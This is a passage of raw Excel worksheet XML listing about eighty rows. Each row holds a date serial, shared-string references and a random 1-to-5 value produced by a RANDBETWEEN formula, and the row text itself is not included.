        <v>42990.761296296296</v>
      </c>
      <c r="C24351" t="s">
        <v>10</v>
      </c>
      <c r="D24351" t="s">
        <v>271</v>
      </c>
      <c r="E24351" s="2" t="s">
        <v>22067</v>
      </c>
      <c r="F24351">
        <f t="shared" ca="1" si="380"/>
        <v>3</v>
      </c>
    </row>
    <row r="24352" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24352" s="1">
        <v>42990.738333333335</v>
      </c>
      <c r="C24352" t="s">
        <v>82</v>
      </c>
      <c r="E24352" s="2" t="s">
        <v>22068</v>
      </c>
      <c r="F24352">
        <f t="shared" ca="1" si="380"/>
        <v>2</v>
      </c>
    </row>
    <row r="24353" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24353" s="1">
        <v>42990.728113425925</v>
      </c>
      <c r="C24353" t="s">
        <v>10</v>
      </c>
      <c r="D24353" t="s">
        <v>6</v>
      </c>
      <c r="E24353" t="s">
        <v>22069</v>
      </c>
      <c r="F24353">
        <f t="shared" ca="1" si="380"/>
        <v>1</v>
      </c>
    </row>
    <row r="24354" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A24354" s="1">
        <v>42990.719444444447</v>
      </c>
      <c r="C24354" t="s">
        <v>10</v>
      </c>
      <c r="D24354" t="s">
        <v>56</v>
      </c>
      <c r="E24354" s="2" t="s">
        <v>22070</v>
      </c>
      <c r="F24354">
        <f t="shared" ca="1" si="380"/>
        <v>3</v>
      </c>
    </row>
    <row r="24355" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A24355" s="1">
        <v>42990.713888888888</v>
      </c>
      <c r="C24355" t="s">
        <v>260</v>
      </c>
      <c r="E24355" s="2" t="s">
        <v>22071</v>
      </c>
      <c r="F24355">
        <f t="shared" ca="1" si="380"/>
        <v>2</v>
      </c>
    </row>
    <row r="24356" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24356" s="1">
        <v>42990.671284722222</v>
      </c>
      <c r="C24356" t="s">
        <v>10</v>
      </c>
      <c r="D24356" t="s">
        <v>151</v>
      </c>
      <c r="E24356" t="s">
        <v>22072</v>
      </c>
      <c r="F24356">
        <f t="shared" ca="1" si="380"/>
        <v>4</v>
      </c>
    </row>
    <row r="24357" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24357" s="1">
        <v>42990.666886574072</v>
      </c>
      <c r="C24357" t="s">
        <v>189</v>
      </c>
      <c r="E24357" s="2" t="s">
        <v>22073</v>
      </c>
      <c r="F24357">
        <f t="shared" ca="1" si="380"/>
        <v>4</v>
      </c>
    </row>
    <row r="24358" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24358" s="1">
        <v>42990.622442129628</v>
      </c>
      <c r="C24358" t="s">
        <v>107</v>
      </c>
      <c r="E24358" s="2" t="s">
        <v>22074</v>
      </c>
      <c r="F24358">
        <f t="shared" ca="1" si="380"/>
        <v>4</v>
      </c>
    </row>
    <row r="24359" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24359" s="1">
        <v>42990.6175</v>
      </c>
      <c r="C24359" t="s">
        <v>10</v>
      </c>
      <c r="D24359" t="s">
        <v>89</v>
      </c>
      <c r="E24359" t="s">
        <v>22075</v>
      </c>
      <c r="F24359">
        <f t="shared" ca="1" si="380"/>
        <v>5</v>
      </c>
    </row>
    <row r="24360" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24360" s="1">
        <v>42990.610185185185</v>
      </c>
      <c r="C24360" t="s">
        <v>10</v>
      </c>
      <c r="D24360" t="s">
        <v>89</v>
      </c>
      <c r="E24360" t="s">
        <v>22076</v>
      </c>
      <c r="F24360">
        <f t="shared" ca="1" si="380"/>
        <v>2</v>
      </c>
    </row>
    <row r="24361" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24361" s="1">
        <v>42990.571226851855</v>
      </c>
      <c r="C24361" t="s">
        <v>189</v>
      </c>
      <c r="E24361" s="2" t="s">
        <v>22073</v>
      </c>
      <c r="F24361">
        <f t="shared" ca="1" si="380"/>
        <v>3</v>
      </c>
    </row>
    <row r="24362" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24362" s="1">
        <v>42990.571076388886</v>
      </c>
      <c r="C24362" t="s">
        <v>731</v>
      </c>
      <c r="E24362" t="s">
        <v>22077</v>
      </c>
      <c r="F24362">
        <f t="shared" ca="1" si="380"/>
        <v>1</v>
      </c>
    </row>
    <row r="24363" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24363" s="1">
        <v>42990.555578703701</v>
      </c>
      <c r="C24363" t="s">
        <v>41</v>
      </c>
      <c r="E24363" s="2" t="s">
        <v>22078</v>
      </c>
      <c r="F24363">
        <f t="shared" ca="1" si="380"/>
        <v>3</v>
      </c>
    </row>
    <row r="24364" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A24364" s="1">
        <v>42990.489884259259</v>
      </c>
      <c r="C24364" t="s">
        <v>10</v>
      </c>
      <c r="D24364" t="s">
        <v>36</v>
      </c>
      <c r="E24364" s="2" t="s">
        <v>22079</v>
      </c>
      <c r="F24364">
        <f t="shared" ca="1" si="380"/>
        <v>3</v>
      </c>
    </row>
    <row r="24365" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24365" s="1">
        <v>42990.481168981481</v>
      </c>
      <c r="C24365" t="s">
        <v>10</v>
      </c>
      <c r="D24365" t="s">
        <v>36</v>
      </c>
      <c r="E24365" s="2" t="s">
        <v>22080</v>
      </c>
      <c r="F24365">
        <f t="shared" ca="1" si="380"/>
        <v>1</v>
      </c>
    </row>
    <row r="24366" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24366" s="1">
        <v>42990.468055555553</v>
      </c>
      <c r="C24366" t="s">
        <v>10</v>
      </c>
      <c r="D24366" t="s">
        <v>89</v>
      </c>
      <c r="E24366" t="s">
        <v>22081</v>
      </c>
      <c r="F24366">
        <f t="shared" ca="1" si="380"/>
        <v>5</v>
      </c>
    </row>
    <row r="24367" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24367" s="1">
        <v>42990.467662037037</v>
      </c>
      <c r="C24367" t="s">
        <v>10</v>
      </c>
      <c r="D24367" t="s">
        <v>163</v>
      </c>
      <c r="E24367" t="s">
        <v>22082</v>
      </c>
      <c r="F24367">
        <f t="shared" ca="1" si="380"/>
        <v>2</v>
      </c>
    </row>
    <row r="24368" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A24368" s="1">
        <v>42990.450694444444</v>
      </c>
      <c r="C24368" t="s">
        <v>10</v>
      </c>
      <c r="D24368" t="s">
        <v>89</v>
      </c>
      <c r="E24368" s="2" t="s">
        <v>22083</v>
      </c>
      <c r="F24368">
        <f t="shared" ca="1" si="380"/>
        <v>2</v>
      </c>
    </row>
    <row r="24369" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24369" s="1">
        <v>42990.447569444441</v>
      </c>
      <c r="C24369" t="s">
        <v>10</v>
      </c>
      <c r="D24369" t="s">
        <v>336</v>
      </c>
      <c r="E24369" t="s">
        <v>22084</v>
      </c>
      <c r="F24369">
        <f t="shared" ca="1" si="380"/>
        <v>2</v>
      </c>
    </row>
    <row r="24370" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A24370" s="1">
        <v>42990.436712962961</v>
      </c>
      <c r="C24370" t="s">
        <v>48</v>
      </c>
      <c r="E24370" s="2" t="s">
        <v>22085</v>
      </c>
      <c r="F24370">
        <f t="shared" ca="1" si="380"/>
        <v>4</v>
      </c>
    </row>
    <row r="24371" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24371" s="1">
        <v>42990.41678240741</v>
      </c>
      <c r="C24371" t="s">
        <v>686</v>
      </c>
      <c r="E24371" t="s">
        <v>22086</v>
      </c>
      <c r="F24371">
        <f t="shared" ca="1" si="380"/>
        <v>4</v>
      </c>
    </row>
    <row r="24372" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24372" s="1">
        <v>42990.407534722224</v>
      </c>
      <c r="C24372" t="s">
        <v>10</v>
      </c>
      <c r="D24372" t="s">
        <v>232</v>
      </c>
      <c r="E24372" t="s">
        <v>22087</v>
      </c>
      <c r="F24372">
        <f t="shared" ca="1" si="380"/>
        <v>1</v>
      </c>
    </row>
    <row r="24373" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24373" s="1">
        <v>42990.400856481479</v>
      </c>
      <c r="C24373" t="s">
        <v>10</v>
      </c>
      <c r="D24373" t="s">
        <v>1091</v>
      </c>
      <c r="E24373" t="s">
        <v>22088</v>
      </c>
      <c r="F24373">
        <f t="shared" ca="1" si="380"/>
        <v>1</v>
      </c>
    </row>
    <row r="24374" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24374" s="1">
        <v>42990.400451388887</v>
      </c>
      <c r="C24374" t="s">
        <v>10</v>
      </c>
      <c r="D24374" t="s">
        <v>1091</v>
      </c>
      <c r="E24374" t="s">
        <v>22089</v>
      </c>
      <c r="F24374">
        <f t="shared" ca="1" si="380"/>
        <v>3</v>
      </c>
    </row>
    <row r="24375" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24375" s="1">
        <v>42990.39640046296</v>
      </c>
      <c r="C24375" t="s">
        <v>71</v>
      </c>
      <c r="E24375" s="2" t="s">
        <v>22090</v>
      </c>
      <c r="F24375">
        <f t="shared" ca="1" si="380"/>
        <v>4</v>
      </c>
    </row>
    <row r="24376" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24376" s="1">
        <v>42990.394699074073</v>
      </c>
      <c r="C24376" t="s">
        <v>3515</v>
      </c>
      <c r="E24376" s="2" t="s">
        <v>22091</v>
      </c>
      <c r="F24376">
        <f t="shared" ca="1" si="380"/>
        <v>5</v>
      </c>
    </row>
    <row r="24377" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24377" s="1">
        <v>42990.382187499999</v>
      </c>
      <c r="C24377" t="s">
        <v>48</v>
      </c>
      <c r="E24377" t="s">
        <v>22092</v>
      </c>
      <c r="F24377">
        <f t="shared" ca="1" si="380"/>
        <v>5</v>
      </c>
    </row>
    <row r="24378" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24378" s="1">
        <v>42990.356712962966</v>
      </c>
      <c r="C24378" t="s">
        <v>10</v>
      </c>
      <c r="D24378" t="s">
        <v>23</v>
      </c>
      <c r="E24378" t="s">
        <v>22093</v>
      </c>
      <c r="F24378">
        <f t="shared" ca="1" si="380"/>
        <v>5</v>
      </c>
    </row>
    <row r="24379" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24379" s="1">
        <v>42990.348368055558</v>
      </c>
      <c r="C24379" t="s">
        <v>41</v>
      </c>
      <c r="E24379" t="s">
        <v>22094</v>
      </c>
      <c r="F24379">
        <f t="shared" ca="1" si="380"/>
        <v>2</v>
      </c>
    </row>
    <row r="24380" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A24380" s="1">
        <v>42990.34097222222</v>
      </c>
      <c r="C24380" t="s">
        <v>48</v>
      </c>
      <c r="E24380" s="2" t="s">
        <v>22095</v>
      </c>
      <c r="F24380">
        <f t="shared" ca="1" si="380"/>
        <v>1</v>
      </c>
    </row>
    <row r="24381" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24381" s="1">
        <v>42990.314120370371</v>
      </c>
      <c r="C24381" t="s">
        <v>124</v>
      </c>
      <c r="E24381" t="s">
        <v>22096</v>
      </c>
      <c r="F24381">
        <f t="shared" ca="1" si="380"/>
        <v>5</v>
      </c>
    </row>
    <row r="24382" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24382" s="1">
        <v>42990.301400462966</v>
      </c>
      <c r="C24382" t="s">
        <v>41</v>
      </c>
      <c r="E24382" t="s">
        <v>22097</v>
      </c>
      <c r="F24382">
        <f t="shared" ca="1" si="380"/>
        <v>3</v>
      </c>
    </row>
    <row r="24383" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24383" s="1">
        <v>42990.299513888887</v>
      </c>
      <c r="C24383" t="s">
        <v>173</v>
      </c>
      <c r="E24383" s="2" t="s">
        <v>22098</v>
      </c>
      <c r="F24383">
        <f t="shared" ca="1" si="380"/>
        <v>4</v>
      </c>
    </row>
    <row r="24384" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A24384" s="1">
        <v>42990.287997685184</v>
      </c>
      <c r="C24384" t="s">
        <v>67</v>
      </c>
      <c r="E24384" s="2" t="s">
        <v>22099</v>
      </c>
      <c r="F24384">
        <f t="shared" ca="1" si="380"/>
        <v>3</v>
      </c>
    </row>
    <row r="24385" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A24385" s="1">
        <v>42990.262152777781</v>
      </c>
      <c r="C24385" t="s">
        <v>559</v>
      </c>
      <c r="E24385" s="2" t="s">
        <v>22100</v>
      </c>
      <c r="F24385">
        <f t="shared" ca="1" si="380"/>
        <v>1</v>
      </c>
    </row>
    <row r="24386" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A24386" s="1">
        <v>42990.261967592596</v>
      </c>
      <c r="C24386" t="s">
        <v>559</v>
      </c>
      <c r="E24386" s="2" t="s">
        <v>22101</v>
      </c>
      <c r="F24386">
        <f t="shared" ref="F24386:F24449" ca="1" si="381">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="24387" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A24387" s="1">
        <v>42990.261828703704</v>
      </c>
      <c r="C24387" t="s">
        <v>559</v>
      </c>
      <c r="E24387" s="2" t="s">
        <v>22102</v>
      </c>
      <c r="F24387">
        <f t="shared" ca="1" si="381"/>
        <v>4</v>
      </c>
    </row>
    <row r="24388" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A24388" s="1">
        <v>42990.260972222219</v>
      </c>
      <c r="C24388" t="s">
        <v>559</v>
      </c>
      <c r="E24388" s="2" t="s">
        <v>22103</v>
      </c>
      <c r="F24388">
        <f t="shared" ca="1" si="381"/>
        <v>5</v>
      </c>
    </row>
    <row r="24389" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A24389" s="1">
        <v>42990.255891203706</v>
      </c>
      <c r="C24389" t="s">
        <v>71</v>
      </c>
      <c r="E24389" s="2" t="s">
        <v>22104</v>
      </c>
      <c r="F24389">
        <f t="shared" ca="1" si="381"/>
        <v>4</v>
      </c>
    </row>
    <row r="24390" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24390" s="1">
        <v>42990.235324074078</v>
      </c>
      <c r="C24390" t="s">
        <v>48</v>
      </c>
      <c r="E24390" s="2" t="s">
        <v>22105</v>
      </c>
      <c r="F24390">
        <f t="shared" ca="1" si="381"/>
        <v>2</v>
      </c>
    </row>
    <row r="24391" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24391" s="1">
        <v>42990.207604166666</v>
      </c>
      <c r="C24391" t="s">
        <v>1408</v>
      </c>
      <c r="E24391" t="s">
        <v>22106</v>
      </c>
      <c r="F24391">
        <f t="shared" ca="1" si="381"/>
        <v>3</v>
      </c>
    </row>
    <row r="24392" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24392" s="1">
        <v>42990.197546296295</v>
      </c>
      <c r="C24392" t="s">
        <v>71</v>
      </c>
      <c r="E24392" t="s">
        <v>22107</v>
      </c>
      <c r="F24392">
        <f t="shared" ca="1" si="381"/>
        <v>5</v>
      </c>
    </row>
    <row r="24393" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24393" s="1">
        <v>42990.173877314817</v>
      </c>
      <c r="C24393" t="s">
        <v>41</v>
      </c>
      <c r="E24393" s="2" t="s">
        <v>22108</v>
      </c>
      <c r="F24393">
        <f t="shared" ca="1" si="381"/>
        <v>5</v>
      </c>
    </row>
    <row r="24394" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24394" s="1">
        <v>42990.166006944448</v>
      </c>
      <c r="C24394" t="s">
        <v>41</v>
      </c>
      <c r="E24394" t="s">
        <v>22109</v>
      </c>
      <c r="F24394">
        <f t="shared" ca="1" si="381"/>
        <v>2</v>
      </c>
    </row>
    <row r="24395" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A24395" s="1">
        <v>42990.017222222225</v>
      </c>
      <c r="C24395" t="s">
        <v>41</v>
      </c>
      <c r="E24395" s="2" t="s">
        <v>22110</v>
      </c>
      <c r="F24395">
        <f t="shared" ca="1" si="381"/>
        <v>1</v>
      </c>
    </row>
    <row r="24396" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24396" s="1">
        <v>42989.812314814815</v>
      </c>
      <c r="C24396" t="s">
        <v>10</v>
      </c>
      <c r="D24396" t="s">
        <v>6</v>
      </c>
      <c r="E24396" t="s">
        <v>22111</v>
      </c>
      <c r="F24396">
        <f t="shared" ca="1" si="381"/>
        <v>5</v>
      </c>
    </row>
    <row r="24397" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24397" s="1">
        <v>42989.752326388887</v>
      </c>
      <c r="C24397" t="s">
        <v>10</v>
      </c>
      <c r="D24397" t="s">
        <v>92</v>
      </c>
      <c r="E24397" t="s">
        <v>22112</v>
      </c>
      <c r="F24397">
        <f t="shared" ca="1" si="381"/>
        <v>3</v>
      </c>
    </row>
    <row r="24398" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24398" s="1">
        <v>42989.750972222224</v>
      </c>
      <c r="C24398" t="s">
        <v>10</v>
      </c>
      <c r="D24398" t="s">
        <v>89</v>
      </c>
      <c r="E24398" t="s">
        <v>22113</v>
      </c>
      <c r="F24398">
        <f t="shared" ca="1" si="381"/>
        <v>5</v>
      </c>
    </row>
    <row r="24399" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24399" s="1">
        <v>42989.744583333333</v>
      </c>
      <c r="C24399" t="s">
        <v>10</v>
      </c>
      <c r="D24399" t="s">
        <v>94</v>
      </c>
      <c r="E24399" t="s">
        <v>22114</v>
      </c>
      <c r="F24399">
        <f t="shared" ca="1" si="381"/>
        <v>2</v>
      </c>
    </row>
    <row r="24400" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24400" s="1">
        <v>42989.696319444447</v>
      </c>
      <c r="C24400" t="s">
        <v>10</v>
      </c>
      <c r="D24400" t="s">
        <v>6</v>
      </c>
      <c r="E24400" t="s">
        <v>22115</v>
      </c>
      <c r="F24400">
        <f t="shared" ca="1" si="381"/>
        <v>2</v>
      </c>
    </row>
    <row r="24401" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24401" s="1">
        <v>42989.683483796296</v>
      </c>
      <c r="C24401" t="s">
        <v>10</v>
      </c>
      <c r="D24401" t="s">
        <v>56</v>
      </c>
      <c r="F24401">
        <f t="shared" ca="1" si="381"/>
        <v>5</v>
      </c>
    </row>
    <row r="24402" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24402" s="1">
        <v>42989.661481481482</v>
      </c>
      <c r="C24402" t="s">
        <v>10</v>
      </c>
      <c r="D24402" t="s">
        <v>381</v>
      </c>
      <c r="E24402" t="s">
        <v>22116</v>
      </c>
      <c r="F24402">
        <f t="shared" ca="1" si="381"/>
        <v>2</v>
      </c>
    </row>
    <row r="24403" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24403" s="1">
        <v>42989.66002314815</v>
      </c>
      <c r="C24403" t="s">
        <v>10</v>
      </c>
      <c r="D24403" t="s">
        <v>89</v>
      </c>
      <c r="E24403" t="s">
        <v>22117</v>
      </c>
      <c r="F24403">
        <f t="shared" ca="1" si="381"/>
        <v>5</v>
      </c>
    </row>
    <row r="24404" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A24404" s="1">
        <v>42989.64634259259</v>
      </c>
      <c r="C24404" t="s">
        <v>10</v>
      </c>
      <c r="D24404" t="s">
        <v>89</v>
      </c>
      <c r="E24404" s="2" t="s">
        <v>22118</v>
      </c>
      <c r="F24404">
        <f t="shared" ca="1" si="381"/>
        <v>3</v>
      </c>
    </row>
    <row r="24405" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A24405" s="1">
        <v>42989.632986111108</v>
      </c>
      <c r="C24405" t="s">
        <v>10</v>
      </c>
      <c r="D24405" t="s">
        <v>494</v>
      </c>
      <c r="E24405" s="2" t="s">
        <v>22119</v>
      </c>
      <c r="F24405">
        <f t="shared" ca="1" si="381"/>
        <v>4</v>
      </c>
    </row>
    <row r="24406" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A24406" s="1">
        <v>42989.619363425925</v>
      </c>
      <c r="C24406" t="s">
        <v>10</v>
      </c>
      <c r="D24406" t="s">
        <v>251</v>
      </c>
      <c r="E24406" s="2" t="s">
        <v>22120</v>
      </c>
      <c r="F24406">
        <f t="shared" ca="1" si="381"/>
        <v>4</v>
      </c>
    </row>
    <row r="24407" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24407" s="1">
        <v>42989.616377314815</v>
      </c>
      <c r="C24407" t="s">
        <v>10</v>
      </c>
      <c r="D24407" t="s">
        <v>381</v>
      </c>
      <c r="E24407" t="s">
        <v>22121</v>
      </c>
      <c r="F24407">
        <f t="shared" ca="1" si="381"/>
        <v>4</v>
      </c>
    </row>
    <row r="24408" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24408" s="1">
        <v>42989.609386574077</v>
      </c>
      <c r="C24408" t="s">
        <v>10</v>
      </c>
      <c r="D24408" t="s">
        <v>17</v>
      </c>
      <c r="E24408" t="s">
        <v>22122</v>
      </c>
      <c r="F24408">
        <f t="shared" ca="1" si="381"/>
        <v>4</v>
      </c>
    </row>
    <row r="24409" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24409" s="1">
        <v>42989.60560185185</v>
      </c>
      <c r="C24409" t="s">
        <v>10</v>
      </c>
      <c r="D24409" t="s">
        <v>11</v>
      </c>
      <c r="E24409" t="s">
        <v>22123</v>
      </c>
      <c r="F24409">
        <f t="shared" ca="1" si="381"/>
        <v>1</v>
      </c>
    </row>
    <row r="24410" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24410" s="1">
        <v>42989.575937499998</v>
      </c>
      <c r="C24410" t="s">
        <v>10</v>
      </c>
      <c r="D24410" t="s">
        <v>36</v>
      </c>
      <c r="E24410" t="s">
        <v>22124</v>
      </c>
      <c r="F24410">
        <f t="shared" ca="1" si="381"/>
        <v>4</v>
      </c>
    </row>
    <row r="24411" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24411" s="1">
        <v>42989.572534722225</v>
      </c>
      <c r="C24411" t="s">
        <v>10</v>
      </c>
      <c r="D24411" t="s">
        <v>251</v>
      </c>
      <c r="E24411" s="2" t="s">
        <v>22125</v>
      </c>
      <c r="F24411">
        <f t="shared" ca="1" si="381"/>
        <v>1</v>
      </c>
    </row>
    <row r="24412" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A24412" s="1">
        <v>42989.570023148146</v>
      </c>
      <c r="C24412" t="s">
        <v>10</v>
      </c>
      <c r="D24412" t="s">
        <v>23</v>
      </c>
      <c r="E24412" s="2" t="s">
        <v>22126</v>
      </c>
      <c r="F24412">
        <f t="shared" ca="1" si="381"/>
        <v>2</v>
      </c>
    </row>
    <row r="24413" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24413" s="1">
        <v>42989.569131944445</v>
      </c>
      <c r="C24413" t="s">
        <v>10</v>
      </c>
      <c r="D24413" t="s">
        <v>20</v>
      </c>
      <c r="E24413" t="s">
        <v>22127</v>
      </c>
      <c r="F24413">
        <f t="shared" ca="1" si="381"/>
        <v>4</v>
      </c>
    </row>
    <row r="24414" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24414" s="1">
        <v>42989.561076388891</v>
      </c>
      <c r="C24414" t="s">
        <v>10</v>
      </c>
      <c r="D24414" t="s">
        <v>89</v>
      </c>
      <c r="E24414" t="s">
        <v>22128</v>
      </c>
      <c r="F24414">
        <f t="shared" ca="1" si="381"/>
        <v>3</v>
      </c>
    </row>
    <row r="24415" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24415" s="1">
        <v>42989.525983796295</v>
      </c>
      <c r="C24415" t="s">
        <v>41</v>
      </c>
      <c r="E24415" s="2" t="s">
        <v>22129</v>
      </c>
      <c r="F24415">
        <f t="shared" ca="1" si="381"/>
        <v>2</v>
      </c>
    </row>
    <row r="24416" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A24416" s="1">
        <v>42989.504814814813</v>
      </c>
      <c r="C24416" t="s">
        <v>10</v>
      </c>
      <c r="D24416" t="s">
        <v>163</v>
      </c>
      <c r="E24416" s="2" t="s">
        <v>22130</v>
      </c>
      <c r="F24416">
        <f t="shared" ca="1" si="381"/>
        <v>5</v>
      </c>
    </row>
    <row r="24417" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24417" s="1">
        <v>42989.498159722221</v>
      </c>
      <c r="C24417" t="s">
        <v>48</v>
      </c>
      <c r="E24417" t="s">
        <v>22131</v>
      </c>
      <c r="F24417">
        <f t="shared" ca="1" si="381"/>
        <v>5</v>
      </c>
    </row>
    <row r="24418" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A24418" s="1">
        <v>42989.496550925927</v>
      </c>
      <c r="C24418" t="s">
        <v>10</v>
      </c>
      <c r="D24418" t="s">
        <v>667</v>
      </c>
      <c r="E24418" s="2" t="s">
        <v>22132</v>
      </c>
      <c r="F24418">
        <f t="shared" ca="1" si="381"/>
        <v>4</v>
      </c>
    </row>
    <row r="24419" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24419" s="1">
        <v>42989.479432870372</v>
      </c>
      <c r="C24419" t="s">
        <v>65</v>
      </c>
      <c r="E24419" t="s">
        <v>22133</v>
      </c>
      <c r="F24419">
        <f t="shared" ca="1" si="381"/>
        <v>2</v>
      </c>
    </row>
    <row r="24420" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24420" s="1">
        <v>42989.478750000002</v>
      </c>
      <c r="C24420" t="s">
        <v>410</v>
      </c>
      <c r="E24420" t="s">
        <v>22134</v>
      </c>
      <c r="F24420">
        <f t="shared" ca="1" si="381"/>
        <v>2</v>
      </c>
    </row>
    <row r="24421" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24421" s="1">
        <v>42989.469270833331</v>
      </c>
      <c r="C24421" t="s">
        <v>41</v>
      </c>
      <c r="E24421" t="s">
        <v>22135</v>
      </c>
      <c r="F24421">
        <f t="shared" ca="1" si="381"/>
        <v>2</v>
      </c>
    </row>
    <row r="24422" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24422" s="1">
        <v>42989.467187499999</v>
      </c>
      <c r="C24422" t="s">
        <v>6</v>
      </c>
      <c r="D24422" t="s">
        <v>25</v>
      </c>
      <c r="F24422">
        <f t="shared" ca="1" si="381"/>
        <v>3</v>
      </c>
    </row>
    <row r="24423" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24423" s="1">
        <v>42989.461319444446</v>
      </c>
      <c r="C24423" t="s">
        <v>48</v>
      </c>
      <c r="E24423" t="s">
        <v>22136</v>
      </c>
      <c r="F24423">
        <f t="shared" ca="1" si="381"/>
        <v>1</v>
      </c>
    </row>
    <row r="24424" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24424" s="1">
        <v>42989.455717592595</v>
      </c>
      <c r="C24424" t="s">
        <v>6</v>
      </c>
      <c r="D24424" t="s">
        <v>25</v>
      </c>
      <c r="E24424" t="s">
        <v>22137</v>
      </c>
      <c r="F24424">
        <f t="shared" ca="1" si="381"/>
        <v>5</v>
      </c>
    </row>
    <row r="24425" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24425" s="1">
        <v>42989.454687500001</v>
      </c>
      <c r="C24425" t="s">
        <v>10</v>
      </c>
      <c r="D24425" t="s">
        <v>151</v>
      </c>
      <c r="E24425" s="2" t="s">
        <v>22138</v>
      </c>
      <c r="F24425">
        <f t="shared" ca="1" si="381"/>
        <v>5</v>
      </c>
    </row>
    <row r="24426" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A24426" s="1">
        <v>42989.454664351855</v>
      </c>
      <c r="C24426" t="s">
        <v>10</v>
      </c>
      <c r="D24426" t="s">
        <v>244</v>
      </c>
      <c r="E24426" s="2" t="s">
        <v>22139</v>
      </c>
      <c r="F24426">
        <f t="shared" ca="1" si="381"/>
        <v>4</v>
      </c>
    </row>
    <row r="24427" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A24427" s="1">
        <v>42989.442986111113</v>
      </c>
      <c r="C24427" t="s">
        <v>10</v>
      </c>
      <c r="D24427" t="s">
        <v>71</v>
      </c>
      <c r="E24427" s="2" t="s">
        <v>22140</v>
      </c>
      <c r="F24427">
        <f t="shared" ca="1" si="381"/>
        <v>4</v>
      </c>
    </row>
    <row r="24428" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24428" s="1">
        <v>42989.442118055558</v>
      </c>
      <c r="C24428" t="s">
        <v>10</v>
      </c>
      <c r="D24428" t="s">
        <v>92</v>
      </c>
      <c r="E24428" t="s">
        <v>22141</v>
      </c>
      <c r="F24428">
        <f t="shared" ca="1" si="381"/>
        <v>1</v>
      </c>
    </row>
    <row r="24429" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24429" s="1">
        <v>42989.40221064815</v>
      </c>
      <c r="C24429" t="s">
        <v>48</v>
      </c>
      <c r="E24429" s="2" t="s">
        <v>22142</v>
      </c>
      <c r="F24429">
        <f t="shared" ca="1" si="381"/>
        <v>2</v>
      </c>
    </row>
    <row r="24430" spans="1:6" x14ac:dyDescent="0.25">
